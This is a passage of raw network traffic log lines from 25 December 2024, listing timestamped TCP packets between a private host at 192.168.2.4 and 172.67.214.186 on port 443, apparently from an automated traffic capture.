                                                                                                                                          Dec 25, 2024 22:17:37.258750916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.258765936 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.258861065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.258867979 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.258904934 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.262877941 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.262892962 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.262968063 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.262975931 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.263050079 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.429353952 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.429372072 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.429425001 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.429436922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.429470062 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.429471016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.433065891 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.433080912 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.433146000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.433154106 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.433373928 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.436454058 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.436470032 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.436527967 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.436534882 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.436563015 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.436669111 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.440618992 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.440634966 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.440754890 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.440754890 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.440762997 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.440902948 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.444202900 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.444217920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.444272041 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.444278955 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.444319010 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.444355965 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.448041916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.448056936 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.448162079 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.448169947 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.448215961 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.451483965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.451498985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.451577902 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.451586008 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.451647043 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.455554008 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.455569029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.455646038 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.455652952 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.455703974 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.621777058 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.621795893 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.621912956 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.621922970 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.395339012 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.398619890 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.398634911 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.398711920 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.398711920 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.398721933 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.398765087 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.402810097 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.402825117 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.402883053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.402909040 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.402916908 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.403032064 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.406250000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.406264067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.406339884 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.406348944 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.406507015 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.410449028 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.410484076 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.410608053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.410618067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.410669088 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.414412975 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.414427996 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.414522886 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.414530993 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.414576054 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.417866945 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.417881012 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.417946100 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.417954922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.418061972 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.583921909 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.583940029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.584007025 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.584039927 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.584055901 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.584256887 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.587374926 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.587388039 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.587467909 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.587467909 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.587480068 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.587693930 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.591542959 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.591559887 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.591625929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.591634989 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.591681957 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.595025063 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.595043898 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.595115900 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.595115900 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.595124960 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.595185041 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.599193096 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.599206924 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.599276066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.599283934 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.599325895 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.602639914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.602653027 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.602704048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.602711916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.602826118 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.606523037 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.606538057 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.606602907 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.606611013 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.606653929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.610282898 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.610301018 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.610354900 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.610364914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.610402107 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.610402107 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.776393890 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.776408911 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.776483059 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.776514053 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.776535034 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.776571035 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.779855967 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.779870033 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.779988050 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.779998064 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.780093908 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.783217907 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.783231974 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.783287048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.783296108 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.783339977 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.787533045 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.787548065 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.787625074 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.787632942 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.787723064 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.790847063 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.790862083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.790945053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.790954113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.791057110 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.795116901 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.795130968 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.795202971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.795202971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.795212030 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.795264006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.798971891 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.798986912 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.799029112 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.799036980 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.799069881 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.799088955 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.802469015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.802489996 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.802552938 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.802561045 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.802609921 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.802625895 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.968725920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.968741894 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.968831062 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.968846083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.969002962 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.972168922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.972184896 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.972285032 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.972295046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.972450972 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.975586891 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.975600004 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.975672007 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.975681067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.753248930 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.753266096 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.753338099 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.753346920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.753400087 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.756732941 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.756747007 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.756793976 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.756802082 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.756815910 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.756845951 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.760669947 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.760685921 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.760756016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.760762930 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.760807037 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.764069080 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.764089108 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.764147997 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.764158010 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.764202118 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.778445959 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.930471897 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.930495024 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.930586100 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.930598021 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.930646896 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.933900118 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.933916092 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.933975935 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.933984041 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.934030056 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.938049078 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.938062906 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.938121080 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.938131094 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.938174963 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.941529989 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.941545963 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.941606998 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.941616058 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.941658974 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.945700884 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.945718050 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.945794106 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.945802927 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.945846081 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.949156046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.949171066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.949220896 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.949229956 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.949275970 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.953104973 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.953119993 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.953192949 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.953202009 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.953243971 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.956547976 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.956562042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.956619978 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:39.956628084 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:39.956671000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.122874975 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.122893095 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.122961998 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.122973919 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.123029947 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.126230001 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.126249075 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.126321077 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.126329899 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.126374960 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.130439043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.130451918 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.130557060 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.130564928 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.130604982 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.133898020 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.133912086 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.133969069 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.133976936 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.134021997 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.138039112 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.138051987 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.138097048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.138104916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.138137102 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.141501904 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.141515017 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.141566038 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.141575098 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.141618967 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.145421028 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.145433903 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.145488024 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.145495892 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.145546913 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.148832083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.148845911 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.148916006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.148926020 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.148969889 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.315536022 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.315551996 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.315606117 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.315617085 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.315658092 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.319003105 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.319017887 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.319082975 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.319091082 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.319138050 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.322330952 CET44349744172.67.214.186192.168.2.4
